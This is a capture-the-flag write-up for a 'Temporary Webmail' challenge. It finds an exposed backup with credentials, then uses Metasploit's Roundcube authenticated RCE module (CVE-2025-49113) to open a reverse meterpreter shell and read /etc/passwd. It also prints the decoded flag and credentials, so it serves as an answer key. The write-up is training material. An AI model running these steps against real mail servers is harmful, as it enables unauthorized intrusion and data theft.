Skip to content

Temporary Webmail

Category: RoundCube Webmail    |    Points: 3    |    Difficulty: Easy

🧠 Challenge Text

Hi, emergency troubleshooter,

the e-mail administrator, Bob, was tasked with hastily setting up a new webmail server for temporary access to old e-mails. Verify whether the server is properly secured (you know how it usually goes with temporary services).

Stay grounded!

Webmail runs on server webmail.powergrid.tcc.

🔍 Hints Text

1. Hint IT department is known for using disposable test accounts ADM40090, ADM40091, ADM40092 up to ADM40099.

🎨 Solution

Lets traverse webmail url paths using gobuster tool and directory list.

$ gobuster dir -u http://webmail.powergrid.tcc -w ~/directory-list-lowercase-2.3-medium.txt

...
/backup               (Status: 301) [Size: 331] [--> http://webmail.powergrid.tcc/backup/]
...

An interesting /backup endpoint contains archive which can be downloaded locally. From the hint we can find user ADM40092 and password WELCOME6.

Logged In

In webmail portal the important bit is version of RoundCube webmail Roundcube Webmail 1.6.10.

Metasploit

I used metasploit as other options such as fearsoff with reverse tcp shell did not work.

Run msf console

$ msfconsole

Use correct exploit and see available options

msf > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > options

Set all the parameters for our task

msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME ADM40092
USERNAME => ADM40092
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD WELCOME6
PASSWORD => WELCOME6
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST 10.200.0.11
LHOST => 10.200.0.11
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set HOST webmail.powergrid.tcc
HOST => webmail.powergrid.tcc
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOST webmail.powergrid.tcc
RHOST => webmail.powergrid.tcc
msf exploit(multi/http/
roundcube_auth_rce_cve_2025_49113) > run -j

msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > sessions  -i 1

Logged in Session

Inside session try to get passwd file contet

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MariaDB Server,,,:/nonexistent:/bin/false
dovecot:x:102:103:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:103:104:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
postfix:x:104:105::/var/spool/postfix:/usr/sbin/nologin
flag:x:65535:65535:RkxBR3tXbThuLXQ1cWUteEhueS1nNEdPfQ==:/nonexistent:/usr/sbin/nologin
adm40092:x:1001:1001::/home/adm40092:/bin/sh

Finally, use the base64 string within flag user and get decode it

$ echo RkxBR3tXbThuLXQ1cWUteEhueS1nNEdPfQ== | base64 -d
FLAG{Wm8n-t5qe-xHny-g4GO}